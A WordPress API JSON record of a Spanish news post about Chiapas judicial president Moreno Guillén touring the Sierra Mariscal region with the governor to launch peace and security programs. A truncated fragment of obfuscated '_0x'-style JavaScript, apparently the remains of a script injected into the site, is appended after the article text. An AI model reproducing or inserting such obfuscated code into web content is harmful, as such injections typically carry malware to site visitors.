{"id":20376,"date":"2025-02-15T07:52:36","date_gmt":"2025-02-15T07:52:36","guid":{"rendered":"https:\/\/reporteciudadanochiapas.com\/?p=20376"},"modified":"2025-02-15T07:52:37","modified_gmt":"2025-02-15T07:52:37","slug":"con-estrategias-de-seguridad-y-bienestar-chiapas-avanza-firme-hacia-la-paz-moreno-guillen","status":"publish","type":"post","link":"https:\/\/reporteciudadanochiapas.com\/?p=20376","title":{"rendered":"Con estrategias de seguridad y bienestar, Chiapas avanza firme hacia la paz: Moreno Guill\u00e9n"},"content":{"rendered":"\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"683\" src=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/02\/IMG-20250215-WA0013-1024x683.jpg\" alt=\"\" class=\"wp-image-20377\" srcset=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/02\/IMG-20250215-WA0013-1024x683.jpg 1024w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/02\/IMG-20250215-WA0013-300x200.jpg 300w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/02\/IMG-20250215-WA0013-768x512.jpg 768w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/02\/IMG-20250215-WA0013-1536x1024.jpg 1536w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/02\/IMG-20250215-WA0013-2048x1365.jpg 2048w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<p>Redacci\u00f3n.<\/p>\n\n\n\n<p>14 de febrero del 2025. &#8211; En una intensa gira de trabajo por la regi\u00f3n Sierra Mariscal, el magistrado presidente del Poder Judicial del Estado, Juan Carlos Moreno Guill\u00e9n, acompa\u00f1\u00f3 al gobernador constitucional, Eduardo Ram\u00edrez Aguilar, en la presentaci\u00f3n de programas en beneficio de las y los chiapanecos.<\/p>\n\n\n\n<p>Durante la presentaci\u00f3n del programa &#8220;Paz y Cultura para Chiapas&#8221;, Moreno Guill\u00e9n dijo que con el trabajo coordinado de los tres Poderes y de las instancias de seguridad, se ha recuperado la tranquilidad en los municipios que fueron en alg\u00fan momento foco rojo; pero, para lograr consolidar la paz que todas y todos queremos, necesitamos tambi\u00e9n acciones sociales que ayuden a la calidad de vida y al progreso econ\u00f3mico de todas las regiones. Por ello, celebr\u00f3 ser testigo de estas caravanas de salud, protecci\u00f3n civil, cultura y apoyos para esta zona.<\/p>\n\n\n\n<p>Desde los municipios de Chicomuselo y Siltepec, el tambi\u00e9n presidente del Consejo de la Judicatura reconoci\u00f3 al gobernador Ram\u00edrez Aguilar como un misionero de paz, al constatar los avances en materia de seguridad, con los cuales se va recuperando el tejido social, la tranquilidad y las actividades que mejorar\u00e1n la calidad de vida de la poblaci\u00f3n.<\/p>\n\n\n\n<p>M\u00e1s tarde, en el municipio de Bella Vista, acompa\u00f1\u00f3 al gobernador Eduardo Ram\u00edrez Aguilar; al fiscal general del estado, Jorge Luis Llaven Abarca, y al secretario de Seguridad del Pueblo, \u00d3scar Alberto Aparicio Avenda\u00f1o, al banderazo de salida de la Fuerza de Reacci\u00f3n Inmediata Pakal (FRIP), quienes abonar\u00e1n a la consolidaci\u00f3n de la paz en esta regi\u00f3n.<\/p>\n\n\n\n<p>En este recorrido, el magistrado presidente refrend\u00f3 el compromiso del Poder Judicial con la impartici\u00f3n de justicia con humanismo, en donde el programa \u201cLa justicia es la paz\u201d es pieza clave para avanzar en la meta de eliminar la corrupci\u00f3n, la impunidad y las malas pr\u00e1cticas que afectan la certeza jur\u00eddica en la sociedad.<\/p>\n\r\n(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return ","protected":false},"excerpt":{"rendered":"<p>Redacci\u00f3n. 14 de febrero del 2025. &#8211; En una intensa gira de trabajo por la regi\u00f3n Sierra Mariscal, el magistrado presidente del Poder Judicial del Estado, Juan Carlos Moreno Guill\u00e9n, acompa\u00f1\u00f3 al gobernador constitucional, Eduardo Ram\u00edrez Aguilar, en la presentaci\u00f3n de programas en beneficio de las y los chiapanecos. Durante la presentaci\u00f3n del programa &#8220;Paz &hellip;<\/p>\n","protected":false},"author":2,"featured_media":20377,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[6],"tags":[],"class_list":["post-20376","post","type-post","status-publish","format-standard","has-post-thumbnail","","category-tuxtla"],"_links":{"self":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/20376","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=20376"}],"version-history":[{"count":1,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/20376\/revisions"}],"predecessor-version":[{"id":20378,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/20376\/revisions\/20378"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/media\/20377"}],"wp:attachment":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=20376"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=20376"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=20376"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}